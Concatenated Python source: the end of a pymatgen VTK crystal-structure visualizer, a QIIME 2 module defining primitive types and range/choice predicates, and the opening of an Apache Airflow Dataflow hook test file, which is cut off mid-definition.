self.ren.AddActor(follower)
follower.SetCamera(self.ren.GetActiveCamera())
follower.VisibilityOff()
def annotate_pick(obj, event):
if picker.GetCellId() < 0:
follower.VisibilityOff()
else:
pick_pos = picker.GetPickPosition()
mapper = picker.GetMapper()
if mapper in self.mapper_map:
site = self.mapper_map[mapper]
output = [
site.species_string,
"Frac. coords: " + " ".join([f"{c:.4f}" for c in site.frac_coords]),
]
source.SetText("\n".join(output))
follower.SetPosition(pick_pos)
follower.VisibilityOn()
picker.AddObserver("EndPickEvent", annotate_pick)
self.picker = picker
self.iren.SetPicker(picker)
class StructureInteractorStyle(vtkInteractorStyleTrackballCamera):
"""
A custom interactor style for visualizing structures.
"""
def __init__(self, parent):
"""
Args:
parent ():
"""
self.parent = parent
self.AddObserver("LeftButtonPressEvent", self.leftButtonPressEvent)
self.AddObserver("MouseMoveEvent", self.mouseMoveEvent)
self.AddObserver("LeftButtonReleaseEvent", self.leftButtonReleaseEvent)
self.AddObserver("KeyPressEvent", self.keyPressEvent)
def leftButtonPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
self.mouse_motion = 0
self.OnLeftButtonDown()
def mouseMoveEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
self.mouse_motion = 1
self.OnMouseMove()
def leftButtonReleaseEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
ren = obj.GetCurrentRenderer()
iren = ren.GetRenderWindow().GetInteractor()
if self.mouse_motion == 0:
pos = iren.GetEventPosition()
iren.GetPicker().Pick(pos[0], pos[1], 0, ren)
self.OnLeftButtonUp()
def keyPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
parent = obj.GetCurrentRenderer().parent
sym = parent.iren.GetKeySym()
if sym in "ABCabc":
if sym == "A":
parent.supercell[0][0] += 1
elif sym == "B":
parent.supercell[1][1] += 1
elif sym == "C":
parent.supercell[2][2] += 1
elif sym == "a":
parent.supercell[0][0] = max(parent.supercell[0][0] - 1, 1)
elif sym == "b":
parent.supercell[1][1] = max(parent.supercell[1][1] - 1, 1)
elif sym == "c":
parent.supercell[2][2] = max(parent.supercell[2][2] - 1, 1)
parent.redraw()
elif sym == "numbersign":
parent.show_polyhedron = not parent.show_polyhedron
parent.redraw()
elif sym == "minus":
parent.show_bonds = not parent.show_bonds
parent.redraw()
elif sym == "bracketleft":
parent.poly_radii_tol_factor -= 0.05 if parent.poly_radii_tol_factor > 0 else 0
parent.redraw()
elif sym == "bracketright":
parent.poly_radii_tol_factor += 0.05
parent.redraw()
elif sym == "h":
parent.show_help = not parent.show_help
parent.redraw()
elif sym == "r":
parent.redraw(True)
elif sym == "s":
parent.write_image("image.png")
elif sym == "Up":
parent.rotate_view(1, 90)
elif sym == "Down":
parent.rotate_view(1, -90)
elif sym == "Left":
parent.rotate_view(0, -90)
elif sym == "Right":
parent.rotate_view(0, 90)
elif sym == "o":
parent.orthongonalize_structure()
parent.redraw()
self.OnKeyPress()
def make_movie(structures, output_filename="movie.mp4", zoom=1.0, fps=20, bitrate="10000k", quality=1, **kwargs):
r"""
Generate a movie from a sequence of structures using vtk and ffmpeg.
Args:
structures ([Structure]): sequence of structures
output_filename (str): filename for structure output. defaults to
movie.mp4
zoom (float): A zoom to be applied to the visualizer. Defaults to 1.0.
fps (int): Frames per second for the movie. Defaults to 20.
        bitrate (str): Video bitrate. Defaults to "10000k" (fairly high
quality).
quality (int): A quality scale. Defaults to 1.
\\*\\*kwargs: Any kwargs supported by StructureVis to modify the images
generated.
"""
vis = StructureVis(**kwargs)
vis.show_help = False
vis.redraw()
vis.zoom(zoom)
sigfig = int(math.floor(math.log10(len(structures))) + 1)
filename = "image{0:0" + str(sigfig) + "d}.png"
for i, s in enumerate(structures):
vis.set_structure(s)
vis.write_image(filename.format(i), 3)
filename = "image%0" + str(sigfig) + "d.png"
args = [
"ffmpeg",
"-y",
"-i",
filename,
"-q:v",
str(quality),
"-r",
str(fps),
"-b:v",
str(bitrate),
output_filename,
]
with subprocess.Popen(args) as p:
p.communicate()
class MultiStructuresVis(StructureVis):
"""
Visualization for multiple structures.
"""
DEFAULT_ANIMATED_MOVIE_OPTIONS = {
"time_between_frames": 0.1,
"looping_type": "restart",
"number_of_loops": 1,
"time_between_loops": 1.0,
}
def __init__(
self,
element_color_mapping=None,
show_unit_cell=True,
show_bonds=False,
show_polyhedron=False,
poly_radii_tol_factor=0.5,
excluded_bonding_elements=None,
animated_movie_options=DEFAULT_ANIMATED_MOVIE_OPTIONS,
):
"""
Args:
element_color_mapping: Optional color mapping for the elements,
as a dict of {symbol: rgb tuple}. For example, {"Fe": (255,
123,0), ....} If None is specified, a default based on
Jmol"s color scheme is used.
show_unit_cell: Set to False to not show the unit cell
boundaries. Defaults to True.
            show_bonds: Set to True to show bonds. Defaults to False.
show_polyhedron: Set to True to show polyhedrons. Defaults to
False.
poly_radii_tol_factor: The polyhedron and bonding code uses the
ionic radii of the elements or species to determine if two
atoms are bonded. This specifies a tolerance scaling factor
such that atoms which are (1 + poly_radii_tol_factor) * sum
of ionic radii apart are still considered as bonded.
excluded_bonding_elements: List of atom types to exclude from
bonding determination. Defaults to an empty list. Useful
when trying to visualize a certain atom type in the
framework (e.g., Li in a Li-ion battery cathode material).
            animated_movie_options (dict): Options controlling the animated
                movie; see DEFAULT_ANIMATED_MOVIE_OPTIONS for the supported
                keys.
"""
super().__init__(
element_color_mapping=element_color_mapping,
show_unit_cell=show_unit_cell,
show_bonds=show_bonds,
show_polyhedron=show_polyhedron,
poly_radii_tol_factor=poly_radii_tol_factor,
excluded_bonding_elements=excluded_bonding_elements,
)
self.warningtxt_actor = vtk.vtkActor2D()
self.infotxt_actor = vtk.vtkActor2D()
self.structures = None
style = MultiStructuresInteractorStyle(self)
self.iren.SetInteractorStyle(style)
self.istruct = 0
self.current_structure = None
self.set_animated_movie_options(animated_movie_options=animated_movie_options)
def set_structures(self, structures, tags=None):
"""
Add list of structures to the visualizer.
Args:
structures (List of Structures):
tags (): List of tags.
"""
self.structures = structures
self.istruct = 0
self.current_structure = self.structures[self.istruct]
self.tags = tags if tags is not None else []
self.all_radii = []
self.all_vis_radii = []
for struct in self.structures:
struct_radii = []
struct_vis_radii = []
for site in struct:
radius = 0
for specie, occu in site.species.items():
radius += occu * (
specie.ionic_radius
if isinstance(specie, Species) and specie.ionic_radius
else specie.average_ionic_radius
)
vis_radius = 0.2 + 0.002 * radius
struct_radii.append(radius)
struct_vis_radii.append(vis_radius)
self.all_radii.append(struct_radii)
self.all_vis_radii.append(struct_vis_radii)
self.set_structure(self.current_structure, reset_camera=True, to_unit_cell=False)
def set_structure(self, structure, reset_camera=True, to_unit_cell=False):
"""
Add a structure to the visualizer.
Args:
structure: structure to visualize
reset_camera: Set to True to reset the camera to a default
determined based on the structure.
            to_unit_cell: Whether or not to map sites back into the unit cell.
"""
super().set_structure(structure=structure, reset_camera=reset_camera, to_unit_cell=to_unit_cell)
self.apply_tags()
def apply_tags(self):
"""
Apply tags.
"""
tags = {}
for tag in self.tags:
istruct = tag.get("istruct", "all")
if istruct != "all":
if istruct != self.istruct:
continue
site_index = tag["site_index"]
color = tag.get("color", [0.5, 0.5, 0.5])
opacity = tag.get("opacity", 0.5)
if site_index == "unit_cell_all":
struct_radii = self.all_vis_radii[self.istruct]
for isite, site in enumerate(self.current_structure):
vis_radius = 1.5 * tag.get("radius", struct_radii[isite])
tags[(isite, (0, 0, 0))] = {
"radius": vis_radius,
"color": color,
"opacity": opacity,
}
continue
cell_index = tag["cell_index"]
if "radius" in tag:
vis_radius = tag["radius"]
elif "radius_factor" in tag:
vis_radius = tag["radius_factor"] * self.all_vis_radii[self.istruct][site_index]
else:
vis_radius = 1.5 * self.all_vis_radii[self.istruct][site_index]
tags[(site_index, cell_index)] = {
"radius": vis_radius,
"color": color,
"opacity": opacity,
}
for site_and_cell_index, tag_style in tags.items():
isite, cell_index = site_and_cell_index
site = self.current_structure[isite]
if cell_index == (0, 0, 0):
coords = site.coords
else:
fcoords = site.frac_coords + np.array(cell_index)
site_image = PeriodicSite(
site.species,
fcoords,
self.current_structure.lattice,
to_unit_cell=False,
coords_are_cartesian=False,
properties=site.properties,
)
self.add_site(site_image)
coords = site_image.coords
vis_radius = tag_style["radius"]
color = tag_style["color"]
opacity = tag_style["opacity"]
self.add_partial_sphere(
coords=coords,
radius=vis_radius,
color=color,
start=0,
end=360,
opacity=opacity,
)
def set_animated_movie_options(self, animated_movie_options=None):
"""
Args:
            animated_movie_options (dict): Options for the animated movie;
                None restores DEFAULT_ANIMATED_MOVIE_OPTIONS.
"""
if animated_movie_options is None:
self.animated_movie_options = self.DEFAULT_ANIMATED_MOVIE_OPTIONS.copy()
else:
self.animated_movie_options = self.DEFAULT_ANIMATED_MOVIE_OPTIONS.copy()
for key in animated_movie_options:
if key not in self.DEFAULT_ANIMATED_MOVIE_OPTIONS.keys():
raise ValueError("Wrong option for animated movie")
self.animated_movie_options.update(animated_movie_options)
def display_help(self):
"""
Display the help for various keyboard shortcuts.
"""
helptxt = [
"h : Toggle help",
"A/a, B/b or C/c : Increase/decrease cell by one a, b or c unit vector",
"# : Toggle showing of polyhedrons",
"-: Toggle showing of bonds",
"r : Reset camera direction",
"[/]: Decrease or increase poly_radii_tol_factor by 0.05. Value = " + str(self.poly_radii_tol_factor),
"Up/Down: Rotate view along Up direction by 90 clockwise/anticlockwise",
"Left/right: Rotate view along camera direction by 90 clockwise/anticlockwise",
"s: Save view to image.png",
"o: Orthogonalize structure",
"n: Move to next structure",
"p: Move to previous structure",
"m: Animated movie of the structures",
]
self.helptxt_mapper.SetInput("\n".join(helptxt))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
def display_warning(self, warning):
"""
Args:
warning (str): Warning
"""
self.warningtxt_mapper = vtk.vtkTextMapper()
tprops = self.warningtxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(1, 0, 0)
tprops.BoldOn()
tprops.SetJustificationToRight()
self.warningtxt = f"WARNING : {warning}"
self.warningtxt_actor = vtk.vtkActor2D()
self.warningtxt_actor.VisibilityOn()
self.warningtxt_actor.SetMapper(self.warningtxt_mapper)
self.ren.AddActor(self.warningtxt_actor)
self.warningtxt_mapper.SetInput(self.warningtxt)
winsize = self.ren_win.GetSize()
self.warningtxt_actor.SetPosition(winsize[0] - 10, 10)
self.warningtxt_actor.VisibilityOn()
def erase_warning(self):
"""
Remove warnings.
"""
self.warningtxt_actor.VisibilityOff()
def display_info(self, info):
"""
Args:
info (str): Information.
"""
self.infotxt_mapper = vtk.vtkTextMapper()
tprops = self.infotxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(0, 0, 1)
tprops.BoldOn()
tprops.SetVerticalJustificationToTop()
self.infotxt = f"INFO : {info}"
self.infotxt_actor = vtk.vtkActor2D()
self.infotxt_actor.VisibilityOn()
self.infotxt_actor.SetMapper(self.infotxt_mapper)
self.ren.AddActor(self.infotxt_actor)
self.infotxt_mapper.SetInput(self.infotxt)
winsize = self.ren_win.GetSize()
self.infotxt_actor.SetPosition(10, winsize[1] - 10)
self.infotxt_actor.VisibilityOn()
def erase_info(self):
"""
Erase all info.
"""
self.infotxt_actor.VisibilityOff()
class MultiStructuresInteractorStyle(StructureInteractorStyle):
"""
Interactor for MultiStructureVis.
"""
def __init__(self, parent):
"""
Args:
parent ():
"""
StructureInteractorStyle.__init__(self, parent=parent)
def keyPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
parent = obj.GetCurrentRenderer().parent
sym = parent.iren.GetKeySym()
if sym == "n":
if parent.istruct == len(parent.structures) - 1:
parent.display_warning("LAST STRUCTURE")
parent.ren_win.Render()
else:
parent.istruct += 1
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
elif sym == "p":
if parent.istruct == 0:
parent.display_warning("FIRST STRUCTURE")
parent.ren_win.Render()
else:
parent.istruct -= 1
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
elif sym == "m":
parent.istruct = 0
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
nloops = parent.animated_movie_options["number_of_loops"]
tstep = parent.animated_movie_options["time_between_frames"]
tloops = parent.animated_movie_options["time_between_loops"]
if parent.animated_movie_options["looping_type"] == "restart":
loop_istructs = range(len(parent.structures))
elif parent.animated_movie_options["looping_type"] == "palindrome":
                loop_istructs = list(range(len(parent.structures))) + list(
                    range(len(parent.structures) - 2, -1, -1))
else:
raise ValueError('"looping_type" should be "restart" or "palindrome"')
for iloop in range(nloops):
for istruct in loop_istructs:
time.sleep(tstep)
parent.istruct = istruct
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.display_info(
"Animated movie : structure {:d}/{:d} "
"(loop {:d}/{:d})".format(istruct + 1, len(parent.structures), iloop + 1, nloops)
)
parent.ren_win.Render()
time.sleep(tloops)
parent.erase_info()
parent.display_info("Ended animated movie ...")
parent.ren_win.Render()
StructureInteractorStyle.keyPressEvent(self, obj, event)
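# A minimal usage sketch, not part of the original module: it builds a simple
# CsCl structure and opens the interactive visualizer. The structure and the
# 4.2 Å lattice parameter are illustrative assumptions; VTK with Python
# bindings must be installed for this to run.
if __name__ == "__main__":
    from pymatgen.core.lattice import Lattice

    demo_structure = Structure(
        Lattice.cubic(4.2),
        ["Cs", "Cl"],
        [[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]],
    )
    vis = StructureVis(show_polyhedron=False)
    vis.set_structure(demo_structure)
    vis.show()  # press "h" in the window for the list of keyboard shortcuts
    # To render an animation instead (requires ffmpeg on the PATH):
    #     make_movie([demo_structure] * 10, output_filename="demo.mp4", fps=5)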
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import numbers
import itertools
from qiime2.core.type.template import TypeTemplate, PredicateTemplate
import qiime2.metadata as metadata
import qiime2.core.util as util
_RANGE_DEFAULT_START = float('-inf')
_RANGE_DEFAULT_END = float('inf')
_RANGE_DEFAULT_INCLUSIVE_START = True
_RANGE_DEFAULT_INCLUSIVE_END = False
class _PrimitivePredicateBase(PredicateTemplate):
def get_kind(self):
return 'primitive'
def get_name(self):
return self.__class__.__name__
class Range(_PrimitivePredicateBase):
def __init__(self, *args, inclusive_start=_RANGE_DEFAULT_INCLUSIVE_START,
inclusive_end=_RANGE_DEFAULT_INCLUSIVE_END):
if len(args) == 2:
self.start, self.end = args
elif len(args) == 1:
self.start = _RANGE_DEFAULT_START
self.end, = args
elif len(args) == 0:
self.start = _RANGE_DEFAULT_START
self.end = _RANGE_DEFAULT_END
else:
raise ValueError("Too many arguments passed, expected 0, 1, or 2.")
self.inclusive_start = inclusive_start
self.inclusive_end = inclusive_end
if self.start is None:
self.start = _RANGE_DEFAULT_START
if self.end is None:
self.end = _RANGE_DEFAULT_END
if self.end < self.start:
raise ValueError("End of range precedes start.")
def __hash__(self):
return (hash(type(self)) ^
hash(self.start) ^
hash(self.end) ^
hash(self.inclusive_start) ^
hash(self.inclusive_end))
def __eq__(self, other):
return (type(self) is type(other) and
self.start == other.start and
self.end == other.end and
self.inclusive_start == other.inclusive_start and
self.inclusive_end == other.inclusive_end)
def __repr__(self):
args = []
start = self.start
if start == float('-inf'):
start = None
end = self.end
if end == float('inf'):
end = None
args.append(repr(start))
args.append(repr(end))
if self.inclusive_start is not _RANGE_DEFAULT_INCLUSIVE_START:
args.append('inclusive_start=%r' % self.inclusive_start)
if self.inclusive_end is not _RANGE_DEFAULT_INCLUSIVE_END:
args.append('inclusive_end=%r' % self.inclusive_end)
return "Range(%s)" % (', '.join(args),)
def is_element(self, value):
if self.inclusive_start:
if value < self.start:
return False
elif value <= self.start:
return False
if self.inclusive_end:
if value > self.end:
return False
elif value >= self.end:
return False
return True
def is_symbol_subtype(self, other):
if type(self) is not type(other):
return False
if other.start > self.start:
return False
elif (other.start == self.start
and (not other.inclusive_start)
and self.inclusive_start):
return False
if other.end < self.end:
return False
elif (other.end == self.end
and (not other.inclusive_end)
and self.inclusive_end):
return False
return True
def is_symbol_supertype(self, other):
if type(self) is not type(other):
return False
if other.start < self.start:
return False
elif (other.start == self.start
and (not self.inclusive_start)
and other.inclusive_start):
return False
if other.end > self.end:
return False
elif (other.end == self.end
and (not self.inclusive_end)
and other.inclusive_end):
return False
return True
def collapse_intersection(self, other):
if type(self) is not type(other):
return None
if self.start < other.start:
new_start = other.start
new_inclusive_start = other.inclusive_start
elif other.start < self.start:
new_start = self.start
new_inclusive_start = self.inclusive_start
else:
new_start = self.start
new_inclusive_start = (
self.inclusive_start and other.inclusive_start)
if self.end > other.end:
new_end = other.end
new_inclusive_end = other.inclusive_end
elif other.end > self.end:
new_end = self.end
new_inclusive_end = self.inclusive_end
else:
new_end = self.end
new_inclusive_end = self.inclusive_end and other.inclusive_end
if new_end < new_start:
return None
if (new_start == new_end
and not (new_inclusive_start and new_inclusive_end)):
return None
return self.__class__(new_start, new_end,
inclusive_start=new_inclusive_start,
inclusive_end=new_inclusive_end).template
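    # For example, collapsing Range(0, 10) with Range(5, 15) yields
    # Range(5, 10): the later start and the earlier end win, and inclusivity
    # is AND-ed only at coincident endpoints.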
def iter_boundaries(self):
if self.start != float('-inf'):
yield self.start
if self.end != float('inf'):
yield self.end
def update_ast(self, ast):
start = self.start
if start == float('-inf'):
start = None
end = self.end
if end == float('inf'):
end = None
ast['range'] = [start, end]
ast['inclusive'] = [self.inclusive_start, self.inclusive_end]
def Start(start, inclusive=_RANGE_DEFAULT_INCLUSIVE_START):
return Range(start, _RANGE_DEFAULT_END, inclusive_start=inclusive)
def End(end, inclusive=_RANGE_DEFAULT_INCLUSIVE_END):
return Range(_RANGE_DEFAULT_START, end, inclusive_end=inclusive)
class Choices(_PrimitivePredicateBase):
def __init__(self, *choices):
if not choices:
raise ValueError("'Choices' cannot be instantiated with an empty"
" set.")
# Backwards compatibility with old Choices({1, 2, 3}) syntax
if len(choices) == 1:
if not isinstance(choices[0], (bool, str)):
choices = choices[0]
self.choices = choices = tuple(choices)
if len(choices) != len(set(choices)):
raise ValueError("Duplicates found in choices: %r"
% util.find_duplicates(choices))
def __hash__(self):
return hash(type(self)) ^ hash(frozenset(self.choices))
def __eq__(self, other):
return (type(self) == type(other)
and set(self.choices) == set(other.choices))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__,
repr(list(self.choices))[1:-1])
def is_element(self, value):
return value in self.choices
def is_symbol_subtype(self, other):
if type(self) is not type(other):
return False
return set(self.choices) <= set(other.choices)
def is_symbol_supertype(self, other):
if type(self) is not type(other):
return False
return set(self.choices) >= set(other.choices)
def collapse_intersection(self, other):
if type(self) is not type(other):
return None
new_choices_set = set(self.choices) & set(other.choices)
if not new_choices_set:
return None
# order by appearance:
new_choices = []
for c in itertools.chain(self.choices, other.choices):
if c in new_choices_set:
new_choices.append(c)
new_choices_set.remove(c)
return self.__class__(new_choices).template
def iter_boundaries(self):
yield from self.choices
def update_ast(self, ast):
ast['choices'] = list(self.choices)
def unpack_union(self):
for c in self.choices:
yield self.__class__(c)
class _PrimitiveTemplateBase(TypeTemplate):
public_proxy = 'encode', 'decode'
def __eq__(self, other):
return type(self) is type(other)
def __hash__(self):
return hash(type(self))
def get_name(self):
return self.__class__.__name__[1:] # drop `_`
def get_kind(self):
return 'primitive'
def get_field_names(self):
return []
def validate_field(self, name, field):
raise NotImplementedError
def validate_predicate_expr(self, self_expr, predicate_expr):
predicate = predicate_expr.template
if type(predicate) not in self._valid_predicates:
raise TypeError(str(predicate_expr))
for bound in predicate.iter_boundaries():
if not self.is_element_expr(self_expr, bound):
raise TypeError(bound)
def validate_predicate(self, predicate):
raise NotImplementedError
class _Int(_PrimitiveTemplateBase):
_valid_predicates = {Range}
def is_element(self, value):
return (value is not True and value is not False
and isinstance(value, numbers.Integral))
def is_symbol_subtype(self, other):
if other.get_name() == 'Float':
return True
return super().is_symbol_subtype(other)
def decode(self, string):
return int(string)
def encode(self, value):
return str(value)
class _Str(_PrimitiveTemplateBase):
_valid_predicates = {Choices}
def is_element(self, value):
return isinstance(value, str)
def decode(self, string):
return str(string)
def encode(self, value):
return str(value)
class _Float(_PrimitiveTemplateBase):
_valid_predicates = {Range}
def is_symbol_supertype(self, other):
if other.get_name() == 'Int':
return True
return super().is_symbol_supertype(other)
def is_element(self, value):
# Works with numpy just fine.
return (value is not True and value is not False
and isinstance(value, numbers.Real))
def decode(self, string):
return float(string)
def encode(self, value):
return str(value)
class _Bool(_PrimitiveTemplateBase):
_valid_predicates = {Choices}
def is_element(self, value):
return value is True or value is False
def validate_predicate(self, predicate):
if type(predicate) is Choices:
if set(predicate.iter_boundaries()) == {True, False}:
raise TypeError("Choices should be ommitted when "
"Choices(True, False).")
def decode(self, string):
if string not in ('false', 'true'):
raise TypeError("%s is neither 'true' or 'false'" % string)
return string == 'true'
def encode(self, value):
if value:
return 'true'
else:
return 'false'
class _Metadata(_PrimitiveTemplateBase):
_valid_predicates = set()
def is_element(self, value):
return isinstance(value, metadata.Metadata)
def decode(self, metadata):
# This interface should have already retrieved this object.
if not self.is_element(metadata):
raise TypeError("`Metadata` must be provided by the interface"
" directly.")
return metadata
def encode(self, value):
# TODO: Should this be the provenance representation? Does that affect
# decode?
return value
class _MetadataColumn(_PrimitiveTemplateBase):
_valid_predicates = set()
def is_element_expr(self, self_expr, value):
return value in self_expr.fields[0]
def is_element(self, value):
raise NotImplementedError
def get_field_names(self):
return ["type"]
def validate_field(self, name, field):
if field.get_name() not in ("Numeric", "Categorical"):
raise TypeError("Unsupported type in field: %r"
% (field.get_name(),))
def decode(self, value):
# This interface should have already retrieved this object.
if not isinstance(value, metadata.MetadataColumn):
raise TypeError("`Metadata` must be provided by the interface"
" directly.")
return value
def encode(self, value):
# TODO: Should this be the provenance representation? Does that affect
# decode?
return value
class _Categorical(_PrimitiveTemplateBase):
_valid_predicates = set()
def get_union_membership_expr(self, self_expr):
return 'metadata-column'
def is_element(self, value):
return isinstance(value, metadata.CategoricalMetadataColumn)
class _Numeric(_PrimitiveTemplateBase):
_valid_predicates = set()
def get_union_membership_expr(self, self_expr):
return 'metadata-column'
def is_element(self, value):
return isinstance(value, metadata.NumericMetadataColumn)
Int = _Int()
Float = _Float()
Bool = _Bool()
Str = _Str()
Metadata = _Metadata()
MetadataColumn = _MetadataColumn()
Categorical = _Categorical()
Numeric = _Numeric()
def infer_primitive_type(value):
for t in (Int, Float):
if value in t:
return t % Range(value, value, inclusive_end=True)
for t in (Bool, Str):
if value in t:
return t % Choices(value)
for t in (Metadata, MetadataColumn[Categorical], MetadataColumn[Numeric]):
if value in t:
return t
raise ValueError("Unknown primitive type: %r" % (value,))
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import shlex
import subprocess
import unittest
from typing import Any, Dict
from unittest import mock
from unittest.mock import MagicMock
from uuid import UUID
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.apache.beam.hooks.beam import BeamCommandRunner, BeamHook
from airflow.providers.google.cloud.hooks.dataflow import (
DEFAULT_DATAFLOW_LOCATION,
DataflowHook,
DataflowJobStatus,
DataflowJobType,
_DataflowJobsController,
_fallback_to_project_id_from_variables,
process_line_and_extract_dataflow_job_id_callback,
)
DEFAULT_RUNNER = "DirectRunner"
BEAM_STRING = 'airflow.providers.apache.beam.hooks.beam.{}'
TASK_ID = 'test-dataflow-operator'
JOB_NAME = 'test-dataflow-pipeline'
MOCK_UUID = UUID('cf4a56d2-8101-4217-b027-2af6216feb48')
MOCK_UUID_PREFIX = str(MOCK_UUID)[:8]
UNIQUE_JOB_NAME = f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}'
TEST_TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'apache_beam.examples.wordcount'
JAR_FILE = 'unitest.jar'
JOB_CLASS = 'com.example.UnitTest'
PY_OPTIONS = ['-m']
DATAFLOW_VARIABLES_PY = {'project': 'test', 'staging_location': 'gs://test/staging', 'labels': {'foo': 'bar'}}
DATAFLOW_VARIABLES_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'labels': {'foo': 'bar'},
}
RUNTIME_ENV = {
'additionalExperiments': ['exp_flag1', 'exp_flag2'],
'additionalUserLabels': {'name': 'wrench', 'mass': '1.3kg', 'count': '3'},
'bypassTempDirValidation': {},
'ipConfiguration': 'WORKER_IP_PRIVATE',
'kmsKeyName': (
'projects/TEST_PROJECT_ID/locations/TEST_LOCATIONS/keyRings/TEST_KEYRING/cryptoKeys/TEST_CRYPTOKEYS'
),
'maxWorkers': 10,
'network': 'default',
'numWorkers': 2,
'serviceAccountEmail': 'test@apache.airflow',
'subnetwork': 'regions/REGION/subnetworks/SUBNETWORK',
'tempLocation': 'gs://test/temp',
'workerRegion': "test-region",
'workerZone': 'test-zone',
'zone': 'us-central1-f',
'machineType': 'n1-standard-1',
}
BASE_STRING = 'airflow.providers.google.common.hooks.base_google.{}'
DATAFLOW_STRING = 'airflow.providers.google.cloud.hooks.dataflow.{}'
TEST_PROJECT = 'test-project'
TEST_JOB_ID = 'test-job-id'
TEST_LOCATION = 'custom-location'
DEFAULT_PY_INTERPRETER = 'python3'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_PROJECT_ID = 'test-project-id'
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB_ID = 'test-job-id'
DEFAULT_CANCEL_TIMEOUT = 5 * 60
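# The tests below exercise _fallback_to_project_id_from_variables: a project id may be
# passed either as `project_id` or inside `variables['project']`, passing both raises an
# AirflowException, and the decorated method accepts keyword arguments only.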
class TestFallbackToVariables(unittest.TestCase):
def test_support_project_id_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(project_id="TEST")
mock_instance.assert_called_once_with(project_id="TEST")
def test_support_project_id_from_variable_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(variables={'project': "TEST"})
mock_instance.assert_called_once_with(project_id='TEST', variables={})
def test_raise_exception_on_conflict(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException,
match="The mutually exclusive parameter `project_id` and `project` key in `variables` parameter "
"are both present\\. Please remove one\\.",
):
FixtureFallback().test_fn(variables={'project': "TEST"}, project_id="TEST2")
def test_raise_exception_on_positional_argument(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException, match="You must use keyword arguments in this methods rather than positional"
):
FixtureFallback().test_fn({'project': "TEST"}, "TEST2")
def mock_init(
self,
gcp_conn_id,
delegate_to=None,
impersonation_chain=None,
):
pass
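# TestDataflowHook covers client creation, the deprecated start_python_dataflow and
# start_java_dataflow wrappers (which delegate to BeamHook and then wait_for_done),
# job-name building, and the get_job/metrics/messages/autoscaling-events/wait_for_done
# helpers.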
class TestDataflowHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
self.dataflow_hook.beam_hook = MagicMock()
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.DataflowHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.build")
def test_dataflow_client_creation(self, mock_build, mock_authorize):
result = self.dataflow_hook.get_conn()
mock_build.assert_called_once_with(
'dataflow', 'v1b3', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
